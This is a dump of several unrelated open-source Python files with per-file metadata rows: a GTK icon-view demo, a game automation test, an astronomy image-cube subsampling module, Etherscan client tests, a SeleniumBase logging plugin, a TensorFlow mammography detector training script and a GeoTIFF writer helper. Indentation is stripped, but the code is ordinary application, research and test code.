# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301
# USA
title = "Icon View Basics"
description = """The GtkIconView widget is used to display and manipulate
icons. It uses a GtkTreeModel for data storage, so the list store example might
be helpful. We also use the Gio.File API to get the icons for each file type.
"""
import os
from gi.repository import GLib, Gio, GdkPixbuf, Gtk
class IconViewApp:
(COL_PATH,
COL_DISPLAY_NAME,
COL_PIXBUF,
COL_IS_DIRECTORY,
NUM_COLS) = list(range(5))
def __init__(self, demoapp):
self.pixbuf_lookup = {}
self.demoapp = demoapp
self.window = Gtk.Window()
self.window.set_title('Gtk.IconView demo')
self.window.set_default_size(650, 400)
self.window.connect('destroy', Gtk.main_quit)
vbox = Gtk.VBox()
self.window.add(vbox)
tool_bar = Gtk.Toolbar()
vbox.pack_start(tool_bar, False, False, 0)
up_button = Gtk.ToolButton(stock_id=Gtk.STOCK_GO_UP)
up_button.set_is_important(True)
up_button.set_sensitive(False)
tool_bar.insert(up_button, -1)
home_button = Gtk.ToolButton(stock_id=Gtk.STOCK_HOME)
home_button.set_is_important(True)
tool_bar.insert(home_button, -1)
sw = Gtk.ScrolledWindow()
sw.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
sw.set_policy(Gtk.PolicyType.AUTOMATIC,
Gtk.PolicyType.AUTOMATIC)
vbox.pack_start(sw, True, True, 0)
# create the store and fill it with content
self.parent_dir = '/'
store = self.create_store()
self.fill_store(store)
icon_view = Gtk.IconView(model=store)
icon_view.set_selection_mode(Gtk.SelectionMode.MULTIPLE)
sw.add(icon_view)
# connect to the 'clicked' signal of the "Up" tool button
up_button.connect('clicked', self.up_clicked, store)
# connect to the 'clicked' signal of the "home" tool button
home_button.connect('clicked', self.home_clicked, store)
self.up_button = up_button
self.home_button = home_button
# we now set which model columns that correspond to the text
# and pixbuf of each item
icon_view.set_text_column(self.COL_DISPLAY_NAME)
icon_view.set_pixbuf_column(self.COL_PIXBUF)
# connect to the "item-activated" signal
icon_view.connect('item-activated', self.item_activated, store)
icon_view.grab_focus()
self.window.show_all()
def sort_func(self, store, a_iter, b_iter, user_data):
(a_name, a_is_dir) = store.get(a_iter,
self.COL_DISPLAY_NAME,
self.COL_IS_DIRECTORY)
(b_name, b_is_dir) = store.get(b_iter,
self.COL_DISPLAY_NAME,
self.COL_IS_DIRECTORY)
if a_name is None:
a_name = ''
if b_name is None:
b_name = ''
if (not a_is_dir) and b_is_dir:
return 1
elif a_is_dir and (not b_is_dir):
return -1
elif a_name > b_name:
return 1
elif a_name < b_name:
return -1
else:
return 0
def up_clicked(self, item, store):
self.parent_dir = os.path.split(self.parent_dir)[0]
self.fill_store(store)
# de-sensitize the up button if we are at the root
self.up_button.set_sensitive(self.parent_dir != '/')
def home_clicked(self, item, store):
self.parent_dir = GLib.get_home_dir()
self.fill_store(store)
# Sensitize the up button
self.up_button.set_sensitive(True)
def item_activated(self, icon_view, tree_path, store):
iter_ = store.get_iter(tree_path)
(path, is_dir) = store.get(iter_, self.COL_PATH, self.COL_IS_DIRECTORY)
if not is_dir:
return
self.parent_dir = path
self.fill_store(store)
self.up_button.set_sensitive(True)
def create_store(self):
store = Gtk.ListStore(str, str, GdkPixbuf.Pixbuf, bool)
# set sort column and function
store.set_default_sort_func(self.sort_func)
store.set_sort_column_id(-1, Gtk.SortType.ASCENDING)
return store
def file_to_icon_pixbuf(self, path):
pixbuf = None
# get the theme icon
f = Gio.file_new_for_path(path)
info = f.query_info(Gio.FILE_ATTRIBUTE_STANDARD_ICON,
Gio.FileQueryInfoFlags.NONE,
None)
gicon = info.get_icon()
# check to see if it is an image format we support
for GdkPixbufFormat in GdkPixbuf.Pixbuf.get_formats():
for mime_type in GdkPixbufFormat.get_mime_types():
content_type = Gio.content_type_from_mime_type(mime_type)
if content_type is not None:
break
#TODO: Here 'content_type' could be None, need to fix
try:
format_gicon = Gio.content_type_get_icon(content_type)
if format_gicon.equal(gicon):
gicon = f.icon_new()
break
except:
pass
if gicon in self.pixbuf_lookup:
return self.pixbuf_lookup[gicon]
if isinstance(gicon, Gio.ThemedIcon):
names = gicon.get_names()
icon_theme = Gtk.IconTheme.get_default()
for name in names:
try:
pixbuf = icon_theme.load_icon(name, 64, 0)
break
except GLib.GError:
pass
self.pixbuf_lookup[gicon] = pixbuf
elif isinstance(gicon, Gio.FileIcon):
icon_file = gicon.get_file()
path = icon_file.get_path()
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(path, 72, 72)
self.pixbuf_lookup[gicon] = pixbuf
return pixbuf
def fill_store(self, store):
store.clear()
for name in os.listdir(self.parent_dir):
path = os.path.join(self.parent_dir, name)
is_dir = os.path.isdir(path)
pixbuf = self.file_to_icon_pixbuf(path)
store.append((path, name, pixbuf, is_dir))
def main(demoapp=None):
IconViewApp(demoapp)
Gtk.main()
if __name__ == '__main__':
main()
| lgpl-2.1 | -6,643,193,018,444,488,000 | 31.789238 | 79 | 0.58657 | false |
setsulla/stir | project/magnolia/script/sinoalice/test_org.py | 1 | 1682 | import os
import sys
import time
from magnolia.utility import *
from magnolia.utility import LOG as L
from magnolia.script.sinoalice import testcase_normal
class TestCase(testcase_normal.TestCase):
def __init__(self, *args, **kwargs):
super(TestCase, self).__init__(*args, **kwargs)
@classmethod
def setUpClass(cls):
L.info("*** Start TestCase : %s *** " % __file__)
def test_1(self):
L.info("*** Capture ***")
try:
self.minicap_start(); time.sleep(2)
"""
self.assertTrue(self.reinstall()); time.sleep(2)
self.assertTrue(self.maintenance())
self.assertTrue(self.terms())
self.assertTrue(self.initial_gacha())
self.assertTrue(self.name())
self.assertTrue(self.download())
self.assertTrue(self.select()); time.sleep(5)
self.assertTrue(self.first_sweep()); time.sleep(5)
self.assertTrue(self.message_skip())
self.assertTrue(self.box()); time.sleep(2)
self.assertTrue(self.login_bonus()); time.sleep(2)
self.assertTrue(self.box()); time.sleep(5)
self.assertTrue(self.gacha()); time.sleep(2)
self.assertTrue(self.inherit())
"""
self.minicap_finish(); time.sleep(2)
except Exception as e:
L.warning(type(e).__name__ + ": " + str(e))
#L.warning(traceback.print_exc())
self.minicap_finish(); time.sleep(2)
self.minicap_create_video()
self.fail()
@classmethod
def tearDownClass(cls):
L.info("*** End TestCase : %s *** " % __file__)
| mit | 8,900,257,512,279,673,000 | 34.787234 | 62 | 0.561831 | false |
henry-ngo/VIP | vip_hci/preproc/subsampling.py | 1 | 4966 | #! /usr/bin/env python
"""
Module with pixel and frame subsampling functions.
"""
from __future__ import division
from __future__ import print_function
__author__ = 'C. Gomez @ ULg'
__all__ = ['cube_collapse',
'cube_subsample',
'cube_subsample_trimmean']
import numpy as np
def cube_collapse(cube, mode='median', n=50):
""" Collapses a cube into a frame (3d array to 2d array) depending on the
parameter *mode*. It's possible to perform a trimmed mean combination of the
frames based on description in Brandt+ 2012.
Parameters
----------
cube : array_like
Cube.
mode : {'median', 'mean', 'sum', 'trimmean'}, str optional
Sets the way of collapsing the images in the cube.
n : int, optional
Sets the discarded values at high and low ends. When n = N is the same
as taking the mean, when n = 1 is like taking the median.
Returns
-------
frame : array_like
Output array, cube combined.
"""
arr = cube
if not arr.ndim == 3:
raise TypeError('The input array is not a cube or 3d array.')
if mode=='mean':
frame = np.mean(arr, axis=0)
elif mode=='median':
frame = np.median(arr, axis=0)
elif mode=='sum':
frame = np.sum(arr, axis=0)
elif mode=='trimmean':
N = arr.shape[0]
if N % 2 == 0:
k = (N - n)//2
else:
k = (N - n)/2
frame = np.empty_like(arr[0])
for index, _ in np.ndenumerate(arr[0]):
sort = np.sort(arr[:,index[0],index[1]])
frame[index] = np.mean(sort[k:N-k])
return frame
def cube_subsample(array, n, mode="mean", parallactic=None, verbose=True):
"""Mean/Median combines frames in cube with window n.
Parameters
----------
n : int
Window for mean/median.
array : array_like
Input 3d array, cube.
mode : {'mean','median'}
Switch for choosing mean or median.
parallactic: array_like
List of corresponding parallactic angles.
Returns
-------
arr_view : array_like
Resulting array.
angles : array_like
Parallactic angles.
"""
if not array.ndim == 3:
raise TypeError('The input array is not a cube or 3d array.')
m = int(array.shape[0]/n)
resid = array.shape[0]%n
y = array.shape[1]
x = array.shape[2]
arr = np.empty([m, y, x])
if parallactic is not None:
angles = np.zeros(m)
if mode == 'median': func = np.median
elif mode=='mean': func = np.mean
else:
raise ValueError('Mode should be either Mean or Median.')
for i in range(m):
arr[i, :, :] = func(array[:n, :, :], axis=0)
if parallactic is not None: angles[i] = func(parallactic[:n])
if i >= 1:
arr[i, :, :] = func(array[n*i:n*i+n, :, :], axis=0)
if parallactic is not None:
angles[i] = func(parallactic[n*i:n*i+n])
if verbose:
print("Datacube subsampled by taking the {:} of {:} frames".format(mode ,n))
if resid > 0:
msg = "Initial # of frames and window are not multiples ({:} frames were dropped)"
print(msg.format(resid))
print("New cube contains {:} frames".format(m))
if parallactic is not None:
return arr, angles
else:
return arr
def cube_subsample_trimmean(arr, n, m):
"""Performs a trimmed mean combination every m frames in a cube. Based on
description in Brandt+ 2012.
Parameters
----------
arr : array_like
Cube.
n : int
Sets the discarded values at high and low ends. When n = N is the same
as taking the mean, when n = 1 is like taking the median.
m : int
Window from the trimmed mean.
Returns
-------
arr_view : array_like
Output array, cube combined.
"""
if not arr.ndim == 3:
raise TypeError('The input array is not a cube or 3d array.')
num = int(arr.shape[0]/m)
res = int(arr.shape[0]%m)
y = arr.shape[1]
x = arr.shape[2]
arr2 = np.empty([num+2, y, x])
for i in range(num):
arr2[0] = cube_collapse(arr[:m, :, :], 'trimmean', n)
if i > 0:
arr2[i] = cube_collapse(arr[m*i:m*i+m, :, :], 'trimmean', n)
arr2[num] = cube_collapse(arr[-res:, :, :], 'trimmean', n)
arr_view = arr2[:num+1] # slicing until m+1 - last index not included
print("\nDone trimmed mean over FITS-Cube with window m=" + str(m))
return arr_view
| mit | -7,150,221,523,624,467,000 | 31.03871 | 126 | 0.517519 | false |
Marto32/pyetherscan | tests/test_response.py | 1 | 1328 | """
Tests related to response objects.
"""
import unittest
import requests
from pyetherscan import client, response, error
class FakeResponse(requests.Response):
"""Fake instance of a Response object"""
def __init__(self, status_code, text):
requests.Response.__init__(self)
self.status_code = status_code
self._text = text
@property
def text(self):
return self._text
class BaseResponseTestCase(unittest.TestCase):
def setUp(self):
self.client = client.Client()
def base_request_error(self, code, text):
"""Abstract testing for request errors"""
resp = FakeResponse(code, text)
with self.assertRaises(error.EtherscanRequestError):
response.SingleAddressBalanceResponse(resp)
class TestInitializationResponses(BaseResponseTestCase):
def test_rate_limit_error(self):
self.base_request_error(403, '')
def test_invalid_request(self):
self.base_request_error(200, '')
def test_bad_code_error(self):
self.base_request_error(405, '')
def test_data_error(self):
text = "{\"message\":\"NOTOK\", \"result\":\"Error!\"}"
resp = FakeResponse(200, text)
with self.assertRaises(error.EtherscanDataError):
response.SingleAddressBalanceResponse(resp)
| mit | 777,112,246,740,399,900 | 24.538462 | 63 | 0.655873 | false |
mdmintz/SeleniumBase | seleniumbase/plugins/basic_test_info.py | 1 | 2407 | """
The plugin for saving basic test info to the logs for Selenium tests.
The created file will be saved in the default logs folder (in .../logs)
Data to be saved includes:
* Last page url
* Browser
* Server
* Error
* Traceback
"""
import os
import codecs
import time
import traceback
from nose.plugins import Plugin
from seleniumbase.config import settings
class BasicTestInfo(Plugin):
"""
This plugin will capture basic info when a test fails or
raises an error. It will store that basic test info in
the default logs or in the file specified by the user.
"""
name = "basic_test_info" # Usage: --with-basic_test_info
logfile_name = settings.BASIC_INFO_NAME
def options(self, parser, env):
super(BasicTestInfo, self).options(parser, env=env)
def configure(self, options, conf):
super(BasicTestInfo, self).configure(options, conf)
if not self.enabled:
return
self.options = options
def addError(self, test, err, capt=None):
test_logpath = self.options.log_path + "/" + test.id()
if not os.path.exists(test_logpath):
os.makedirs(test_logpath)
file_name = "%s/%s" % (test_logpath, self.logfile_name)
basic_info_file = codecs.open(file_name, "w+", "utf-8")
self.__log_test_error_data(basic_info_file, test, err, "Error")
basic_info_file.close()
def addFailure(self, test, err, capt=None, tbinfo=None):
test_logpath = self.options.log_path + "/" + test.id()
if not os.path.exists(test_logpath):
os.makedirs(test_logpath)
file_name = "%s/%s" % (test_logpath, self.logfile_name)
basic_info_file = codecs.open(file_name, "w+", "utf-8")
self.__log_test_error_data(basic_info_file, test, err, "Error")
basic_info_file.close()
def __log_test_error_data(self, log_file, test, err, type):
data_to_save = []
data_to_save.append("Last Page: %s" % test.driver.current_url)
data_to_save.append(" Browser: %s" % self.options.browser)
data_to_save.append("Timestamp: %s" % int(time.time()))
data_to_save.append("Server: %s " % self.options.servername)
data_to_save.append("%s: %s" % (type, err[0]))
data_to_save.append("Traceback: " + ''.join(
traceback.format_exception(*err)))
log_file.writelines("\r\n".join(data_to_save))
| mit | -3,147,112,503,173,750,300 | 35.469697 | 71 | 0.631491 | false |
edux300/research | train_loop.py | 1 | 16163 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 19 17:20:10 2017
@author: eduardo
"""
import funcs.patch_loader as pl
import tensorflow as tf
import funcs.utils as ut
import cnns.cnn_models as models
import numpy as np
import os
import funcs.image_processing as iproc
from matplotlib import pyplot as plt
import pickle as pkl
from shutil import copyfile
def print_s(string, file):
    """Print a string to stdout and also write it to the given open log file."""
    print(string)
    print(string, file=file)
def train_loop(experiment_name, model_number, dataset_path, batch_norm=False, dropout=False):
    """
    Train one stage of the cascade and return the per-epoch metrics array.

    experiment_name: name of the results folder under /home/eduardo/Results.
    model_number: 1 or 2, i.e. first or second model of the cascade.
    dataset_path: root folder of the patch dataset used by the patch loader.
    batch_norm, dropout: architecture switches passed to models.detector36.
    """
    # DEFINE PARAMETERS
    #experiment_name = "test_experiment"
    #model_number = 1 # DEFINES IF THIS IS THE FIRST OR SECOND MODEL IN THE CASCADE
    model = models.detector36(False, "model"+str(model_number), False,
                              batch_norm=batch_norm, dropout=dropout) # MODEL ARCHITECTURE
# LEARNING PARAMETERS
learning_rate = 0.0001
#training_iterations = int(5e3) # TRAINING ITERATIONS
training_iterations = int(5e3)
one_epoch_every = 1e2 # ITERATIONS PER EPOCH
number_of_epochs = int(training_iterations/one_epoch_every)+1
"""
PATH:
RESULTS
"""
results_path = "/home/eduardo/Results/"+experiment_name
if model_number == 1:
os.mkdir(results_path)
log_file = open(results_path+"/log"+str(model_number)+".txt","w") # LOG FILE
metrics_save_path = results_path+"/metrics"+str(model_number)+".npy"
save_weights_path = results_path+"/model"+str(model_number)
os.mkdir(save_weights_path)
load_weights_path = None
if model_number == 2:
load_weights_path = results_path+"/model1"
"""
DATASET
"""
#dataset_path = "/home/eduardo/dataset_name"
#if model_number == 2:
# dataset_path += "second"
    evaluation_metric_index = 1 # DEFINES THE POSITION OF THE METRIC USED FOR COMPARISON
    evaluation_metric_objective = 1 # 1 FOR MAXIMIZATION, -1 FOR MINIMIZATION (METRIC VALUES ASSUMED POSITIVE)
number_of_evaluation_metrics = 4
metrics_array = np.zeros((number_of_epochs,number_of_evaluation_metrics*2+1))
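    # column 0: epoch index; then the training metrics followed by the validation
    # metrics (number_of_evaluation_metrics values each, as returned by ut.ut_metrics)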
max_evaluation_metric = -1e9
"""
CONFIGURE PATCH LOADER
"""
sess = tf.Session()
sess.run(tf.global_variables_initializer())
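    # per-iteration training outputs; accumulated here and reset at every epoch boundary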
acts_list, loss_list, y_list = [],[],[]
#if load_weights_path:
#model.load(sess,load_weights_path)
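    # NOTE: restoring the first-stage weights for model 2 is currently left disabled (commented out above).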
epoch_counter = 0
for iteration in range(training_iterations):
# GET LOADED BATCH
batchx,batchy = pl.get_prepared_batch()
# START LOADING NEXT BATCH
pl.load_random_batch("train")
# TRAIN THE MODEL ON THE CURRENT BATCH
loss,acts = model.train(sess,batchx,batchy,learning_rate)
# APPEND ITERATION RESULTS IN THE LISTS
acts_list.append(acts)
loss_list.append(loss)
y_list.append(batchy)
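        # once per epoch: run the model over the full validation split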
if (iteration)%one_epoch_every == 0:
split_counter = pl.iterative_load_full_split("validation",0)
val_acts_list, val_loss_list, val_y_list = [],[],[]
while True:
val_batchx,val_batchy = pl.get_prepared_batch()
split_counter = pl.iterative_load_full_split("validation",split_counter)
val_loss,val_acts = model.test(sess,val_batchx,val_batchy)
val_acts_list.append(val_acts)
val_loss_list.append(val_loss)
val_y_list.append(val_batchy)
if split_counter == 0:
val_batchx,val_batchy = pl.get_prepared_batch()
val_loss,val_acts = model.test(sess,val_batchx,val_batchy)
val_acts_list.append(val_acts)
val_loss_list.append(val_loss)
val_y_list.append(val_batchy)
break
pl.load_random_batch("train")
# COMPUTE METRICS FOR THE TRAINING SET
acts_list = ut.concatenate_arrays(acts_list)[:,1]
loss_list = np.array(loss_list)
y_list = ut.concatenate_arrays(y_list)
metrics = ut.ut_metrics(acts_list, y_list,loss_list)
acts_list, loss_list, y_list = [],[],[]
# COMPUTE METRICS FOR THE VALIDATION SET
val_acts_list = ut.concatenate_arrays(val_acts_list)[:,1]
val_loss_list = np.array(val_loss_list)
val_y_list = ut.concatenate_arrays(val_y_list)
val_metrics = ut.ut_metrics(val_acts_list, val_y_list,val_loss_list)
# PRINT RESULTS
result_string = "Iter: "+str(iteration)
result_string += " | Train: "
for metric in metrics:
result_string += (metric[0] + ": " + str(metric[1]) + ", ")
# PRINT RESULTS
result_string += " | Validation: "
for metric in val_metrics:
result_string += (metric[0] + ": " + str(metric[1]) + ", ")
print_s(result_string,log_file)
# SAVE MODEL IF IT IS THE BEST
curr_evaluation_metric = evaluation_metric_objective * val_metrics[evaluation_metric_index][1]
if curr_evaluation_metric>max_evaluation_metric:
max_evaluation_metric = curr_evaluation_metric
model.save(sess,save_weights_path)
metrics_array[epoch_counter,0] = epoch_counter
i=1
for metric in metrics+val_metrics:
metrics_array[epoch_counter,i] = metric[1]
i+=1
epoch_counter+=1
log_file.close()
np.save(metrics_save_path,metrics_array[0:epoch_counter,:])
sess.close()
return metrics_array[0:epoch_counter,:]
import glob
def create_second_dataset(dataset_first,experiment_name,threshold=0.5):
print("Creating Second Dataset")
tf.reset_default_graph()
sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
dataset_second = results_path+"/second_dataset/"
os.mkdir(dataset_second)
load_weights_path = results_path+"/model1"
model,model_full = load_model(sess,1,load_weights_path)
splits = ["train","validation","test"]
for split in splits:
os.makedirs(dataset_second+split+"/negative")
os.makedirs(dataset_second+split+"/positive")
print("Doing:",split)
neg_images = glob.glob(dataset_first+"/"+split+"/negative/*.npy")
pos_images = glob.glob(dataset_first+"/"+split+"/positive/*.npy")
bar = ut.progress_bar(len(neg_images)+len(pos_images))
for file in neg_images:
bar.tick()
img = np.load(file)
_,pred = model.test(sess,img[np.newaxis,:,:,np.newaxis],np.zeros((1,)))
if pred[0,1]>threshold:
copyfile(file,dataset_second+"/"+split+"/negative/"+os.path.basename(file))
for file in pos_images:
bar.tick()
copyfile(file,dataset_second+"/"+split+"/positive/"+os.path.basename(file))
copyfile(dataset_first+"/dataset_test",dataset_second+"/dataset_test")
print("FINISHED Creating Second Dataset")
"""
# TODO WITH MODEL NUMBER: IDEA -> Use recursion
def test_model(model_num, experiment_name, dataset_first,sigma=2,num_dets=10,thresh=0.5,sufix=""):
tf.reset_default_graph()
sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
#os.mkdir(results_path+"/heatmaps"+str(model_num))
load_weights_path = results_path+"/model1"
model,model_full = load_model(sess,model_num,load_weights_path)
iDs = dataset_first.files_names.keys()
all_suspicions = dict()
bar = ut.progress_bar(len(iDs))
for iD in iDs: # TODO
bar.tick()
all_suspicions[iD] = list()
image = np.load(dataset_first.files_names[iD])
htmap = model_full.test(sess,image)
htmap = iproc.filter_img(htmap,sigma)
htmap = htmap*(htmap>thresh)
htmap = iproc.improved_non_maxima_supression(htmap)
#np.save(results_path+"/heatmaps"+str(model_num)+"/"+os.path.basename(dataset_first.files_names[iD]),htmap)
dets = iproc.detections(htmap,num_dets)
masks = []
masks_files = dataset_first.masks[iD]
for file in masks_files:
mask = np.load(file)
mask = augment_mask(mask)
masks.append(mask)
masks_hit = np.zeros(len(masks))
for det in dets:
correct_mask = inside_masks(det,masks,masks_hit)
if correct_mask!=-1:
if not masks_hit[correct_mask]:
all_suspicions[iD].append([*det,"TP"])
masks_hit[correct_mask]=1
else:
all_suspicions[iD].append([*det,"FP"])
for i in range(len(masks_hit)):
if masks_hit[i] == 0:
all_suspicions[iD].append([-1,-1,"FN"])
pkl.dump(all_suspicions,open(results_path+"/all_suspicions"+sufix,"wb"))
compute_score(all_suspicions,results_path,sufix)
sess.close()
return all_suspicions
"""
def create_pmaps(experiment_name, dataset_first):
#tf.reset_default_graph()
#sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
#os.mkdir(results_path+"/pmaps")
#load_weights_path1 = results_path+"/model1"
#_,model_full1 = load_model(sess,1,load_weights_path1)
iDs = dataset_first.files_names.keys()
bar = ut.progress_bar(len(iDs))
for iD in iDs: # TODO
bar.tick()
#image = np.load(dataset_first.files_names[iD])
#pmap = model_full1.test(sess,image)
#np.save(results_path+"/pmaps"+"/"+str(iD),pmap)
masks = get_masks(dataset_first.masks[iD],add=False)
for i in range(len(masks)):
np.save(results_path+"/pmaps"+"/m"+str(iD)+"_"+str(i),masks[i])
#sess.close()
def test_model(experiment_name, dataset_first,sigma=1,num_dets=40,thresh=0.5, both_models = False):
tf.reset_default_graph()
sess = tf.Session()
results_path = "/home/eduardo/Results/"+experiment_name
load_weights_path1 = results_path+"/model1"
if both_models:
load_weights_path2 = results_path+"/model2"
_,model_full1 = load_model(sess,1,load_weights_path1)
if both_models:
model2,_ = load_model(sess,2,load_weights_path2)
iDs = dataset_first.files_names.keys()
sufix = ""
if both_models: sufix = "second"
all_suspicions = dict()
bar = ut.progress_bar(len(iDs))
for iD in iDs: # TODO
bar.tick()
all_suspicions[iD] = list()
image = np.load(dataset_first.files_names[iD])
detections = get_dets(sess, model_full1, image, sigma=sigma, thresh=thresh, num_dets=num_dets)
if both_models:
detections = reclassify_detections(sess,model2,image,detections)
for i in range(len(detections)):
plt.scatter(detections[i][0][1],detections[i][0][0],c="b")
plt.imshow(model_full1.test(sess,image))
plt.show()
masks = get_masks(dataset_first.masks[iD])
all_suspicions[iD] += get_suspicions(detections, masks)
pkl.dump(all_suspicions,open(results_path+"/all_suspicions"+sufix,"wb"))
compute_score(all_suspicions,results_path,sufix)
sess.close()
return all_suspicions
def reclassify_detections(sess,model,image,detections):
patches = np.zeros((len(detections),36,36,1))
image = iproc.all_pad(image, 20, "reflect")
counter = 0
for det in detections:
x,y = det[0]+20
patches[counter,:,:,0] = image[x-18:x+18,y-18:y+18]
counter+=1
_,preds = model.test(sess,patches,np.ones(len(detections)))
counter = 0
for det in detections:
detections[counter][1] = preds[counter,1]
counter+=1
return detections
def get_suspicions(detections,masks):
suspicions = []
masks_hit = np.zeros(len(masks))
for det in detections:
correct_mask = inside_masks(det,masks,masks_hit)
if correct_mask!=-1:
if not masks_hit[correct_mask]:
suspicions.append([*det,"TP"])
masks_hit[correct_mask]=1
else:
suspicions.append([*det,"FP"])
for i in range(len(masks_hit)):
if masks_hit[i] == 0:
suspicions.append([-1,-1,"FN"])
return suspicions
def get_dets(sess, model_full, image, sigma=0.8, thresh=-1, num_dets=40):
htmap = model_full.test(sess,image)
#htmap = iproc.filter_img(htmap,sigma)
htmap = htmap*(htmap>thresh)
htmap = iproc.improved_non_maxima_supression(htmap)
#np.save(results_path+"/heatmaps"+str(model_num)+"/"+os.path.basename(dataset_first.files_names[iD]),htmap)
dets = iproc.detections(htmap,num_dets)
return dets
def get_masks(masks_files,add=True):
masks = []
for file in masks_files:
mask = np.load(file)
if add:
mask = augment_mask(mask)
masks.append(mask)
return masks
from scipy.ndimage.measurements import center_of_mass as center_of_mass
def augment_mask(mask):
center = center_of_mass(mask)
mask[int(np.floor(center[0]))-9:int(np.ceil(center[0]))+9,int(np.floor(center[1]))-9:int(np.ceil(center[1]))+9] = True
#plt.imshow(mask)
#plt.show()
return mask
def compute_score(all_suspicions,results_path="",sufix=""):
num_of_masses = 0
num_of_images = 0
for image in all_suspicions.keys():
num_of_images+=1
for susp in all_suspicions[image]:
if susp[2] in ["TP","FN"]:
num_of_masses+=1
print("Working with:",num_of_masses," masks")
print("Working with:",num_of_images," images")
tp = np.zeros(num_of_masses)
fp = list()
counter=0
for image in all_suspicions.keys():
for susp in all_suspicions[image]:
if susp[2] == "TP":
tp[counter] = susp[1]
counter+=1
elif susp[2] == "FP":
fp.append(susp[1])
finalTP = np.stack((tp,np.ones(tp.shape)),axis=1)
fp = np.array(fp)
finalFP = np.stack((fp,np.zeros(fp.shape)),axis=1)
final = np.concatenate((finalTP,finalFP),axis = 0)
indexes = np.argsort(final[:,0])
final[:] = final[indexes[::-1]]
tpr_vec = np.cumsum(final[:,1])/num_of_masses
fpi_vec = np.cumsum(final[:,1]==0)/num_of_images
plt.scatter(fpi_vec,tpr_vec,s=0.1)
pkl.dump([fpi_vec,tpr_vec],open(results_path+"/fpi_tpr_vecs"+sufix,"wb"))
plt.savefig(results_path+"/Free_Roc_Curve"+sufix)
return final,fpi_vec,tpr_vec
def inside_masks(det,masks,masks_hit):
for i in range(masks_hit.shape[0]):
center = det[0]
mask = masks[i]
#plt.imshow(mask)
#plt.show()
#print(center)
if mask[center[0],center[1]]:
return i
return -1
def load_model(sess,model_num,load_weights_path):
print(load_weights_path)
model = models.detector36(False, "model"+str(model_num), False,False,False)
model.load(sess,load_weights_path)
model_full = models.detector36(True, "model"+str(model_num), True,False,False)
return model,model_full
#dataset = pkl.load(open("/home/eduardo/data_inbreast_40_deform_elas/dataset_test","rb"))
#experiment_name = "Batch_Dropout_exp_False_True"
#create_pmaps(experiment_name,dataset)
#data = pkl.load(open("/home/eduardo/data_inbreast_40_deform_elas/dataset_test","rb"))
#exp_name = "Batch_Dropout_exp_False_True"
#test_model(exp_name,data)
| apache-2.0 | 2,359,735,837,977,057,300 | 32.257202 | 131 | 0.580276 | false |
DREAM-ODA-OS/tools | imgproc/img/geotiff.py | 1 | 3410 | #!/usr/bin/env python
#-------------------------------------------------------------------------------
#
# GeoTIFF creation subroutine
#
# Author: Martin Paces <[email protected]>
#
#-------------------------------------------------------------------------------
# Copyright (C) 2016 EOX IT Services GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies of this Software or works derived from this Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#-------------------------------------------------------------------------------
from osgeo import gdal; gdal.UseExceptions() #pylint: disable=multiple-statements
from .file_io import ImageFileWriter, DT2GDT
from .util import FormatOptions
# default GeoTIFF file-options
DEF_GEOTIFF_FOPT = {
"TILED": "YES",
"BLOCKXSIZE": "256",
"BLOCKYSIZE": "256",
"COMPRESS": "NONE",
}
def make_gcp(x, y, z, p, l, id_, info=""):
""" Construct GDAL Ground Control Point. """
#pylint: disable=invalid-name, too-many-arguments
return gdal.GCP(x, y, z, p, l, info, str(id_))
def clone_gcp(gcp):
""" Clone GCP object. """
return gdal.GCP(
gcp.GCPX, gcp.GCPY, gcp.GCPZ, gcp.GCPPixel, gcp.GCPLine, gcp.Info, gcp.Id
)
def create_geotiff(path, dtype, nrow, ncol, nband=1, proj=None,
geotrn=None, gcps=None, nodata=None, options=None):
""" Create a GeoTIFF image and return an instance of the ImageFileWriter
class to access this file.
"""
#pylint: disable=too-many-arguments, too-many-locals
# sanitize the inputs
nrow = max(0, int(nrow))
ncol = max(0, int(ncol))
nband = max(1, int(nband))
if options is None:
options = FormatOptions(DEF_GEOTIFF_FOPT).options
# convert type to gdal type
try:
gdal_dtype = DT2GDT[dtype]
except KeyError:
raise ValueError("Unsupported data type! %r" % dtype)
# get GDAL Driver
driver = gdal.GetDriverByName("GTiff")
# create TIFF image
dataset = driver.Create(path, ncol, nrow, nband, gdal_dtype, options)
if proj and geotrn:
# set geo-transformation
dataset.SetProjection(proj)
dataset.SetGeoTransform(geotrn)
elif proj and gcps:
# copy ground control points (a.k.a. tie-points)
dataset.SetGCPs([clone_gcp(gcp) for gcp in gcps], proj)
# create image object
writer = ImageFileWriter(dataset)
#copy no-data value(s)
if nodata is not None:
writer.nodata = nodata
return writer
| mit | 48,940,018,558,685,450 | 33.795918 | 81 | 0.642522 | false |
mathiasertl/django-xmpp-server-list | account/auth_urls.py | 1 | 1456 | # This file is part of django-xmpp-server-list
# (https://github.com/mathiasertl/django-xmpp-server-list)
#
# django-xmpp-server-list is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# xmppllist is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
